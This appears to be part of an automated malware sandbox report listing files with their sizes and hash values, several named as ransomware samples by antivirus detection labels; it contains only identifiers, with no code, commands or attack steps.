SHA512f7d8f359d2567dec87c44bdb9e3c2411bba6ad7e96203e86af127cbde58e761dc7e8e97ded0f40244ef5a2256c17f21652c35a02560460fefe960fa2579dd8a7
-
Filesize
2.2MB
MD59834bce4d5f50fdc342c6a3171aa6356
SHA16f82e558696b49d2a7b3dae5066bc36ff87bea7f
SHA25625f031334d2262c966a7792afb52369c2b294660ab845a1ec4dac6651b314883
SHA51266562d17bfa1576c0ca4aa119beb9bfb6800787323a3498003a61bae25e93eb790acaedfde8301cb5f4c2b5f98db2971a0610f56d0b9fd3e515f663478ee86c2
-
Filesize
109KB
MD5b4ebbae10fc58372050f7d46f9948497
SHA130832f6d9ce431e660b3283499145d00ca9f4922
SHA2562da85bedb46c2a6d024a8dc69099e3e8ad1b312a229a51b870bf0211bceb79ef
SHA51230f956c5ffe5348678e0fca7795a781e16e484385301387e28e961c5d5e0a0d8ab767813339cf68667f2260190a60027f553669b2e412b9c33f1ab6f95f0290f
-
Filesize
11KB
MD5dcee0dbcf84cc9f1620f168d8f8f9fd1
SHA19f570fa253c24a8fe56948f4c6e79982d9644a3b
SHA256385e7a3cf5dd7b65590b064e7bc09f901db7ddc8542396af6bb60048a30993f0
SHA5125b89fe78e841bd05a7c4a626d9b06aa200f8c7d0ebf3b9124aa4440159636fc20ced725d2fe61de7bb4dc210060fddd36f785309a536293455cb863ebff00e77
-
Filesize
807KB
MD516a1612789dc9063ebea1cb55433b45b
SHA1438fde2939bbb9b5b437f64f21c316c17ce4a7f6
SHA2566deaec2f96c8a1c20698a93ddd468d5447b55ac426dc381eef5d91b19953bb7b
SHA512d727ce8cd793c09a8688accb7a2eb5d8f84cc198b8e9d51c21e2dfb11d850f3ac64a58d07ff7fe9d1a2fdb613567e4790866c08a423176216ff310bf24a5a7e3
-
Filesize
1KB
MD5d6a02fc90f628cba550f597d73238f81
SHA144c029287f3580a20caac7b3c56776102af10e22
SHA2563af7dc454bc1397ba65f22a9fd82f8c65aaf661d10c63da5afeb5dffa353b423
SHA512f01ffd61aa934636c97e9fd25d90e219eb7f8adc5b3d175dca7da7dc82a157f6e04d5000ce4cdb6267a3e9c787153e74081ccf8bd1c53fa62233c946679bde76
-
Filesize
18KB
MD597cd44dfbf75710efb8225d059262dd0
SHA1ecc2dfb02b0f3badcaba27da9d9ab606ef1b83a2
SHA2564f9a394a194d05047a6b4e02e64278637e3c9ac3337c9818a23c9eae75295f74
SHA5124594df18ce61f5c0e72b912722865b3596137d2ccd3a94df3e25f86074dbc1d67302b1f52f24ce2180cdf808ec649b7b68bd9a758d5245e4bb03848ce2ba5259
-
Filesize
117KB
MD5d4f8743311fff7dacb9d5ae68b49bfe3
SHA1430b023c3d17a0b63276584cbbb322918239a7cd
SHA2569aa650a9117918b9c57f89b573bb597c91c18e77e4eae0145829a3e283c74b82
SHA51259ac6903a89fd2d4446a78bf885659686b32ff3ebbfae7165c0f8a53279f9c5e5c1e78519751cc8702445bb59adce4fda236f7a9042f24973539f7327a31fe7c
-
Filesize
40KB
MD5b7c3e334648a6cbb03b550b842818409
SHA1767be295f1e4adedf0e10532f9c1b7908d17383a
SHA256f0781a1b879584f494d984e31869eab13f0535825f68862e6597b1639df708bd
SHA51243ee04452b685022bfdbaca5b3603d4c0e406599b8da70c6a25fa2c4ac5543ada4521eba9bbf0ca86a2a4775ce474ab89da7d27f842d63df62048a1b7ca431d1
-
Filesize
638KB
MD531d858c6f1c453af516343758a4b2c69
SHA1ec9fafdb7333df42e3a8fb25f6f0f30ffe36b795
SHA25612abcf99dd28bf35b3c224accfe2587ba5f4199d163224b344cdc770eed36130
SHA51292923ca2f4be8fab82a5104cbc39ce84ce60000d4e825b5ccc0b44ba7f7090f7967b491350adf2f0c4ef9ce63ba93241030245e730f1a77c055b0257e64cbc45
-
Filesize
98KB
MD5904347cc428ecc1fb6dec20ad6350519
SHA11547b616784c39abdaa4699994b2f9ad539180ce
SHA256ff781837e47a42d7dee3d42854b6d66d73cfbc032c47c9620821b737a82800af
SHA512cd2612c9fb2b9aa92e504fe1a830b752962b06819356aeeebaaaf53853ebb676d7bc4497fd88ec0be2b32895f6957682c1571914ff657b49261d275bbd2f0204
-
Filesize
94KB
MD5781f4d391e206c7bf768377ac01fbda9
SHA1dec82000eb5d87bc0151cbe8831a4fa3b1b1e47d
SHA256b6b73b5f5faa0bb2fde3b304141104337fe49d5d3dac77fe24c306cbba447c0f
SHA51205a6753fbc431293da86fbb3c7a49f40c96c655b33bf3a67b69a291babb4e8111997ceb7e2b64c693f282d12495be0ba31a411eb11f7e7699291c2e7a3f4f859
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
94KB
MD514ff402962ad21b78ae0b4c43cd1f194
SHA1f8a510eb26666e875a5bdd1cadad40602763ad72
SHA256fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b
SHA512daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
Filesize1KB
MD5ed3b7ed1c89cbd0a825c346bd198d6d5
SHA1eee41e9b758da72b13aec7f2a1464867b2ca09b2
SHA256461be5b28f19e0f9c0a1692c320ff0807411a82e6dc35e135e96683c662caf6d
SHA51242c58ce71439b3bbf70cd836892e74503c3d00146f4c8a2ad6edc650b43a81854929ce343ca240de1623480241c0bea1477d998ec4b11ccecbf36e041f574fc7
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
Filesize531KB
MD592773d07f3ddfa534426a56d7900c6c0
SHA14ddeef03f04ee3e61251a1672e49757ffdfa3f71
SHA25659c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f
SHA51268eada5a3c56cabf605c8cbb5d605dc9e617b246b910e4beaa9c23ea23ce5acc9f20f9d72b39064dd2c055cb626995c872396497e4b563f638ed904e71440f1d
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Agent.gen-51e7fa42734a3c77208a34b3c5666d5c371c720d45088f5e48e3fd404c8e3065.exe
Filesize84KB
MD52f55fd5f76de2595e09829a170d91e07
SHA1b8fafb5d5731d35c4fd068169843b0a8d14e917b
SHA25651e7fa42734a3c77208a34b3c5666d5c371c720d45088f5e48e3fd404c8e3065
SHA5126ce4b953d6e963efc2f0403e4cf1229722f4806fb7bd6380dcb5ed5dfce62df7ad60b0afb9c19030737f786fdd81debe96882c525959d17fd4a875f58c6e16d4
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Blocker.gen-145313a23f91c4c060e4945a3d05bd66f12b532cfe1451e914c45ce58642729e.exe
Filesize1.5MB
MD59a80f05b2ec2191ae5f0bd56780c5d90
SHA1cb94bf76673927b769f1f6bf63434908ceb9d570
SHA256145313a23f91c4c060e4945a3d05bd66f12b532cfe1451e914c45ce58642729e
SHA512f371e1a54de8a22285972fff3c49e05c0ab6992edf0f53e9873edbdc0115f302223fcc0a4b7fbc1cec7e63bc1d19122e19a8e8fd329cb335b6b2d5000851dd71
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
Filesize3.7MB
MD5be56e4fc39f056dd79755df5854b325f
SHA1a86bfcd2d5bac6cc0398ed46f433b8f1e6e8a83d
SHA2561bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5
SHA512cf19453e8c9bea0cd9b63ce412e5e7ba23c6c46edadc173419d238e085f1220505cb75a5eab5a939bfb94029382fa656d16600151d868cb4ad7085200ff15584
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
Filesize2.1MB
MD578c88fe62b9c7c79ca6636d29e3f97be
SHA19ef94bb01127027ebc80bd3cfdaf311e10be43a7
SHA256cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728
SHA51229a5094edb39e01c6bbaae4a3407c4ba4e932891a7cfa13f9506634693ff3acd45e83df0d2c9d419c67bdfb4ffc994d66b2804d81b0b4261288d3a9efb191c37
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Generic-a7c67294349feb719f3752d0a78c8e6e4605e55bef21ee8f88b3fff0521a886c.exe
Filesize2.8MB
MD55123bdb052efc43b0b472e927ab997bb
SHA10b42d826ea4e067a60c62d007490950af40883e7
SHA256a7c67294349feb719f3752d0a78c8e6e4605e55bef21ee8f88b3fff0521a886c
SHA5125ac24af5938e4d7884da2ad06978aabd1b1869d75ce9941a84ae6699cc7dfd25b3842d58883587e57f187832b23384679e0a9071e70c4876daa5e67a422c3b80
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
Filesize4.0MB
MD5627914078afb6e8601c91fc8552887bc
SHA17e149639e304024e895b2ce7a35a1626abf084f2
SHA256b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5
SHA51252dd6dcfc9d70c8d4fa47c589fc54d939277bcf2fc1989efb8830384b2bce2ebca4ad28c347e2339783f4c4d86edbade9c4a5d3487daa885310db5d7f61883b8
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe
Filesize5.4MB
MD5e6b39be4b897be4aa6a866d352d208bf
SHA1f1bc472aa76e16f5382e7b9820aa3bc374edd8cf
SHA256f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088
SHA5123204e1a8e7d64ab99e175d9069cdddc9731784f2b943784e3d0faafcf49e96ca0374e24346cfcd747e48b08a0302294e45234f9e78dd6459db786d715147e911
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe
Filesize1.8MB
MD5a4762e1e35f04d1e646537f426debb7e
SHA17b0834a9eed3260834ee9276c9a320425a93ff7b
SHA2562d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba
SHA5120334f2b74bb039ad7d3c53d519ee64398b47c97d51abc96f2ba2d365a27abb025ee8d1d0444a8cc6f5976e8032ab46d2559abc6d8c817088513ac73c026e7791
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Crusis.eip-f341d7938f1706152e6fe941fc2f6c9eda782d91e77eea55edc5c1dff9fd2a45.exe
Filesize373KB
MD5b3503e5fc9db875254bcf6cc55b03b37
SHA1dd38875918c46138dc37ef7a3a9bc2ddc4c60b9c
SHA256247dbd8836c7da9d02892d1a25da8fc61d13d89b1aa31804bd5811414a42ee62
SHA51228226c7f5fd91d7b8f67a42b74053501df7e892965d5a50b466f91bb7a98e1b0f471593eb2c72dc16bbab6cd378f83da9426c58221049983f8b0483bbfc58b72
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Cryptor.ano-461d171e82dfdcac0763e92b1cfb208076879912be033d3dfc6bf6f70412e5fa.exe
Filesize231KB
MD50ead3591bb7acb46d7219f757c2e8c70
SHA148206713ad8ae8b55250ce973240ffdad1726436
SHA256477edd29145f38bc0f066675e17d1e15905864ea94bdc8276f39f48395d95f48
SHA512935565260b0c0132a20d94040944f41683e93a3c14fedbe6b67c8bbfb4350e40f263ae5f0ce71bf9a8c06434f2f8c4e0338022812b50c7573529f467ea83d41e
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Cryrar.ct-f7d19b967d8d5c4430f1f07b8e8012b7e4350a36e98d0f76b672c0227d5e37cc.exe
Filesize978KB
MD5a74bf79ccbfe62c3f873a118222cd446
SHA152ce7563a9e31b595835f7c7bbcea4af9be62d4e
SHA256c7140d624c919a41e9bdb912528e72523b143a745a6107ddd26224939a13b6c0
SHA51237064314dae8e3c38f72b46fa763930155bfab29046420c8a262f620d2a1a5585f1f83ae1622724ec823b825fcdd97602838421d6dd4a8255ddbec0f6712cbb1
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Cryrar.hoy-a6963bb5ae9f8bd47ad12e371ddd633ca7dd7bdbe8d9d9ca09fd6f20f2442291.exe
Filesize1.3MB
MD575421959d94a78374ea55f1e99e2c34f
SHA11cfe7990d932a102be9f7f1e930d551febed830b
SHA256ea3206312c4c57b122daa5dc3d5985a5c509ece8b7a8e5dd78d756192cb6ed08
SHA5122de1c3bf7d67cf195baec79ec7e8fd42e505baf4aadacc1c93c091fd4728f4d2cd4f6a0e6ff031ae94cfc698592a439937fbd599816408c1ccb86ab1a1629aea
-
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Shade.oko-71664d9ffc7449b6c5691eb1e07e8ba68c322f6724fa7810fb521b9edeb63842.exe
Filesize88KB
MD5fc4d41be9e7dd37d0aec1ff07e6cd296
SHA1cc21a91575afc889ec0ca79154544c728a5e745b
SHA2562e17d54f0502992a39b5868a3029c6c61fd14769106e54bc6f6d28e05c103f4c
SHA5120f3c3c6d1d596aaedd8a94587e06bfd7285c4ff191d883253c372613aeb91ed5451253d13ecf1509e37338e2fb124d2a851dad895839bcce92e8a30b54a340fb
-
Filesize
379KB
MD51967a022b65f5ee63e3ba6b1484ba525
SHA1c882252b77e61fa4d37157c8f0bb89f5e695ed36
SHA256085d96cba539fe4eb01f595a963a79f73f166d51fe523ef62531e276e97446bb
SHA5125397c6532e14949df49e3b9d6491fbb790ed67f63204377a6a9790386ea8ee91ea532816482e9b3af2fa051f24087345b978023d6c53274f8a31eaef64d3697d
-
Filesize
85KB
MD593a1734f5ca1815f38b1fb44fb6f1772
SHA1cae4b1b0019c020666625da32fdacbef6a191ad7
SHA2563c4f7b41afc5b2b55a59a94735f2b6331522f7bd18597e16aa55048c7fc635ab
SHA512eb4668106b33653ee512e7592e089387c8e918b592a09527d5c10b50bf7af6ed9a82e3f528d1fef964e960f302e0a7c8a457b9e20646bb18910a3d8ca6d1aa90
-
Filesize
395KB
MD5289ef11cea72c68d3be13386c4e0cbc5
SHA1c7e452899e3fe7eff53b7026e841cd782e08181a
SHA25613222af5a2b5f9221e95fdb887e9f2626ad149ad1d0dbbd8d535123e2fa68369
SHA512531f16c5069e22f6f02e6e7499abc51236886536633479ab239606206d0302b0199b02d21081d39027aea81f7024463d35f2b29166606aa10fb8db5e21954562
-
Filesize
81KB
MD583476411de22a4020fc223409ff81f48
SHA1cd7fd7193d68fb85b8273475bb2ffcbe765febcf
SHA256872508fb96244116d4d0484604057a4a968e767b1f167c9ea7b17e59498e0869
SHA51253ffea252bd10ecd7ab18d5823e6966cbd0f95d7f0809074fd78d6a5d2a92591a71f002bff298696a92127b0dd093ca859ea626428cf9b346b3623d353b31bbe